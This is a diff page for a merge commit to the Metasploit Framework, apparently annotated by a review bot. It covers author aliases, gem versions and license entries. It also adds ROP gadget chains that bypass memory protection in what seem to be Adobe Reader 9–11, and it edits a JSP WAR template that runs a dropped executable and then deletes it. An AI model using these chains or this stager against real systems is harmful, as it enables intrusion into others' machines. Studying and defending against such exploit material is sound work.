
Commit dfe4e33

committed
Merge pull request #4 from jvazquez-r7/review_2763
Update against upstream
2 parents 832b045 + d5e1967 commit dfe4e33


208 files changed

+13383
-4132
lines changed


208 files changed

+13383
-4132
lines changed

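--- a/.mailmap
+++ b/.mailmap
@@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <[email protected]>
 dmaloney-r7 <dmaloney-r7@github> David Maloney <[email protected]>
 dmaloney-r7 <dmaloney-r7@github> David Maloney <[email protected]> # aka TheLightCosine
 ecarey-r7 <ecarey-r7@github> Erran Carey <[email protected]>
+farias-r7 <farias-r7@github> Fernando Arias <[email protected]>
 hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
 hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
 jlee-r7 <jlee-r7@github> egypt <[email protected]> # aka egypt
@@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
 jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
 limhoff-r7 <limhoff-r7@github> Luke Imhoff <[email protected]>
 shuckins-r7 <shuckins-r7@github> Samuel Huckins <[email protected]>
-tasos-r7 <tasos-r7@github> Tasos Laskos <[email protected]>
 todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
 todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
+todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
+trosen-r7 <trosen-r7@github> Trevor Rosen <[email protected]>
 wchen-r7 <wchen-r7@github> sinn3r <[email protected]> # aka sinn3r
 wchen-r7 <wchen-r7@github> sinn3r <[email protected]>
 wchen-r7 <wchen-r7@github> Wei Chen <[email protected]>
 wvu-r7 <wvu-r7@github> William Vu <[email protected]>
 wvu-r7 <wvu-r7@github> William Vu <[email protected]>
+wvu-r7 <wvu-r7@github> William Vu <[email protected]>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <[email protected]>
 OJ <oj@github> OJ <[email protected]>
 r3dy <r3dy@github> Royce Davis <[email protected]>
 r3dy <r3dy@github> Royce Davis <[email protected]>
+Rick Flores <[email protected]> Rick Flores (nanotechz9l) <[email protected]>
 rsmudge <rsmudge@github> Raphael Mudge <[email protected]> # Aka `butane
 schierlm <schierlm@github> Michael Schierl <[email protected]> # Aka mihi
 scriptjunkie <scriptjunkie@github> Matt Weeks <[email protected]>
 skape <skape@???> Matt Miller <[email protected]>
 spoonm <spoonm@github> Spoon M <[email protected]>
 swtornio <swtornio@github> Steve Tornio <[email protected]>
+Tasos Laskos <[email protected]> Tasos Laskos <[email protected]>
+TrustedSec <[email protected]> trustedsec <[email protected]>
+
+# Aliases for utility author names. Since they're fake, typos abound
+
+Tab Assassin <[email protected]> Tabasssassin <[email protected]>
+Tab Assassin <[email protected]> Tabassassin <[email protected]>
+Tab Assassin <[email protected]> TabAssassin <[email protected]>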

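--- a/Gemfile
+++ b/Gemfile
@@ -2,6 +2,8 @@ source 'https://rubygems.org'
 
 # Need 3+ for ActiveSupport::Concern
 gem 'activesupport', '>= 3.0.0'
+# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
+gem 'bcrypt-ruby'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
 # Needed by msfgui and other rpc components
@@ -17,7 +19,7 @@ group :db do
 # Needed for Msf::DbManager
 gem 'activerecord'
 # Database models shared between framework and Pro.
-gem 'metasploit_data_models', '~> 0.16.6'
+gem 'metasploit_data_models', '~> 0.16.9'
 # Needed for module caching in Mdm::ModuleDetails
 gem 'pg', '>= 0.11'
 end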
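Review bot: The new `gem 'bcrypt-ruby'` line in the first hunk carries no version constraint, while every other gem visible in this Gemfile is constrained (`'>= 3.0.0'`, `'~> 0.16.9'`, `'>= 0.11'`). Gemfile.lock in this same commit resolves it to 3.1.2, so anyone installing without the lock (or after a `bundle update`) can pick up an arbitrary later release of a dependency used for password handling. Suggest following the file's pessimistic style: `gem 'bcrypt-ruby', '~> 3.1.2'`. The group the hunk sits in starts before the visible lines.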

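--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -13,6 +13,7 @@ GEM
 i18n (~> 0.6, >= 0.6.4)
 multi_json (~> 1.0)
 arel (3.0.2)
+bcrypt-ruby (3.1.2)
 builder (3.0.4)
 database_cleaner (1.1.1)
 diff-lcs (1.2.4)
@@ -21,7 +22,7 @@ GEM
 fivemat (1.2.1)
 i18n (0.6.5)
 json (1.8.0)
-metasploit_data_models (0.16.6)
+metasploit_data_models (0.16.9)
 activerecord (>= 3.2.13)
 activesupport
 pg
@@ -61,11 +62,12 @@ PLATFORMS
 DEPENDENCIES
 activerecord
 activesupport (>= 3.0.0)
+bcrypt-ruby
 database_cleaner
 factory_girl (>= 4.1.0)
 fivemat (= 1.2.1)
 json
-metasploit_data_models (~> 0.16.6)
+metasploit_data_models (~> 0.16.9)
 msgpack
 network_interface (~> 0.0.1)
 nokogiri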

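--- a/LICENSE
+++ b/LICENSE
@@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
 2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic
 
-Files: external/source/meterpreter/ReflectiveDLLInjection/*
-Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 License: BSD-3-clause
 
-Files: external/source/meterpreter/source/common/queue.h
-Copyright: 1991, 1993 The Regents of the University of California
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
-Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
-License: Zlib
-
-Files: external/source/meterpreter/source/bionic/libc/*
-Copyright: 2005-2008, The Android Open Source Project
-2004 by Internet Systems Consortium, Inc. ("ISC")
-1995,1996,1999 by Internet Software Consortium
-1995 by International Business Machines, Inc.
-1997,1998,1999,2004 The NetBSD Foundation, Inc.
-1993 Christopher G. Demetriou
-1983,1985,1989,1993 The Regents of the University of California
-2000 Ben Harris
-1995,1996,1997,1998 WIDE Project
-2003 Networks Associates Technology, Inc.
-1993 by Digital Equipment Corporation
-1997 Mark Brinicombe
-1993 Martin Birgmeier
-1993 by Sun Microsystems, Inc.
-1997, 2005 Todd C. Miller <[email protected]>
-1995, 1996 Carnegie-Mellon University
-2003 Networks Associates Technology, Inc.
-License: BSD-3-clause and BSD-4-clause
-
-Files: external/source/meterpreter/source/bionic/libdl/*
-Copyright: 2007 The Android Open Source Project
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/bionic/libm/*
-Copyright: 2003, Steven G. Kargl
-2003 Mike Barcroft <[email protected]>
-2002-2005 David Schultz <[email protected]>
-2004 Stefan Farfeleder
-2003 Dag-Erling Coïdan Smørgrav
-1996 The NetBSD Foundation, Inc.
-1985,1988,1991,1992,1993 The Regents of the University of California
-1993,94 Winning Strategies, Inc.
-1993, 2004 by Sun Microsystems, Inc.
-License: BSD-2-clause and BSD-3-clause and BSD-4-clause
-
-Files: external/source/meterpreter/source/extensions/espia/screen.c
-Copyright: 1994-2008, Mark Hammond
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
-Copyright: 2005 Vincent Liu
-License: GPL-2
-
-Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
-Copyright: 1994-2008, Mark Hammond
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
-Copyright: 2010, [email protected]
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/pssdk/*
-Copyright: microOLAP
-License: N/A
-Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
-SDK library embedded into the Meterpreter Sniffer extension. This
-source code is not distributed with Metasploit Framework.
-
-Files: external/source/meterpreter/source/openssl/*
-Copyright: 1998-2002 The OpenSSL Project
-License: OpenSSL and SSLeay
-
-Files: external/source/meterpreter/source/server/posix/sfsyscall.h
-Copyright: 2003 Philippe Biondi <[email protected]>
-License: LGPL
-
-Files: external/source/meterpreter/source/jpeg-8/*
-Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/libpcap/*
-Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
-License: BSD-4-clause
-
 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause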
76 KB
Binary file not shown.

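--- a/data/ropdb/reader.xml
+++ b/data/ropdb/reader.xml
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+
+<rop>
+<compatibility>
+<target>9</target>
+</compatibility>
+
+<gadgets base="0x4a800000">
+<gadget offset="0x2313d">pop ecx # ret</gadget>
+<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
+<gadget offset="0x01f90">pop eax # ret</gadget>
+<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
+<gadget offset="0x07e7d">call [eax] # ret</gadget>
+<gadget value="0xffffffff">HANDLE hFile</gadget>
+<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+<gadget value="0x00000040">DWORD flProtect</gadget>
+<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00000000">LPCTSTR lpName</gadget>
+<gadget offset="0x0155a">pop edi # ret</gadget>
+<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x2d4de">pop ebx # ret</gadget>
+<gadget offset="0x01f90">pop eax # ret</gadget>
+<gadget offset="0x476aa">pop ecx # ret</gadget>
+<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
+<gadget offset="0x44122">mov edx, ecx</gadget>
+<gadget offset="0x476aa">pop ecx # ret</gadget>
+<gadget offset="0x07e7d">call [eax] # ret</gadget>
+<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
+<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
+<gadget offset="0x476ab">ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget value="0x00000400">memcpy length</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
+<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>10</target>
+</compatibility>
+
+<gadgets base="0x4a800000">
+<gadget offset="0x26015">pop ecx # ret</gadget>
+<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
+<gadget offset="0x2007d">pop eax # ret</gadget>
+<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
+<gadget offset="0x246d5">call [eax] # ret</gadget>
+<gadget value="0xffffffff">HANDLE hFile</gadget>
+<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+<gadget value="0x00000040">DWORD flProtect</gadget>
+<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00000000">LPCTSTR lpName</gadget>
+<gadget offset="0x05016">pop edi # ret</gadget>
+<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x14241">pop ebx # ret</gadget>
+<gadget offset="0x2007d">pop eax # ret</gadget>
+<gadget offset="0x26015">pop ecx # ret</gadget>
+<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
+<gadget offset="0x4b49d">mov edx, ecx</gadget>
+<gadget offset="0x26015">pop ecx # ret</gadget>
+<gadget offset="0x246d5">call [eax] # ret</gadget>
+<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
+<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
+<gadget offset="0x2a8df">ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget value="0x00000400">memcpy length</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
+<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>11</target>
+</compatibility>
+
+<gadgets base="0x4a800000">
+<gadget offset="0x5822c">pop ecx # ret</gadget>
+<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
+<gadget offset="0x5597f">pop eax # ret</gadget>
+<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
+<gadget offset="0x3f1d5">call [eax] # ret</gadget>
+<gadget value="0xffffffff">HANDLE hFile</gadget>
+<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+<gadget value="0x00000040">DWORD flProtect</gadget>
+<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00000000">LPCTSTR lpName</gadget>
+<gadget offset="0x55093">pop edi # ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
+<gadget offset="0x5597f">pop eax # ret</gadget>
+<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x5822c">pop ecx # ret</gadget>
+<gadget offset="0x3f1d5">call [eax] # ret</gadget>
+<gadget offset="0x5d4f8">pop edx # ret</gadget>
+<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
+<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
+<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
+<gadget offset="0x505a0">memcpy address</gadget>
+<gadget offset="0x60bc4">call eax # ret</gadget>
+<gadget offset="0x505a0">memcpy address</gadget>
+<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
+<gadget offset="0x463d0">pop ebx # ret</gadget>
+<gadget value="0x00000400">memcpy length</gadget>
+<gadget offset="0x5d4f8">pop edx # ret</gadget>
+<gadget offset="0x5d4f8">pop edx # ret</gadget>
+<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
+</gadgets>
+</rop>
+</db>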
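Review bot: The argument labels for CreateFileMappingA are wrong in all three chains: `<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>` appears as the second of two consecutive dwMaximumSizeHigh entries (new lines 18–19, 60–61 and 102–103), but the fifth parameter of that API is dwMaximumSizeLow, so the second entry in each pair should read `DWORD dwMaximumSizeLow`. The element text looks like a descriptive label only, so this appears to be a documentation fix, but confirm the loader does not key on it before changing. The bare `<target>` values 9, 10 and 11 are not self-describing from this file; an XML comment naming what table those ids index would help whoever maintains the file.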

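--- a/data/templates/scripts/to_exe_jsp.war.template
+++ b/data/templates/scripts/to_exe_jsp.war.template
@@ -39,11 +39,13 @@
 if (%{var_proc}.waitFor() == 0) {
 %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
 }
-
+
 File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
-}
-else
+}
+else
 {
-Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+String[] %{var_exepatharray} = new String[1];
+%{var_exepatharray}[0] = %{var_exepath};
+Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
 }
 %%>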
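Review bot: The else branch now passes the path as a `String[]`, so `Runtime.exec` no longer tokenizes it on whitespace, but the `if` branch at new line 40 still calls `%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});` with the String overload, so the same split still happens there when the path contains a space. Suggest `%{var_proc} = Runtime.getRuntime().exec(new String[] { %{var_exepath} });` so both branches agree. The three new lines could likewise be written as one, `Process %{var_proc} = Runtime.getRuntime().exec(new String[] { %{var_exepath} });`, which avoids introducing the extra `%{var_exepatharray}` template variable. The enclosing if/else begins before the hunk, so the earlier launch that line 40 retries is not visible here.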

data/vncdll.dll

-435 KB
Binary file not shown.

data/vncdll.x64.dll

-76.5 KB
Binary file not shown.

data/vncdll.x86.dll

393 KB
Binary file not shown.
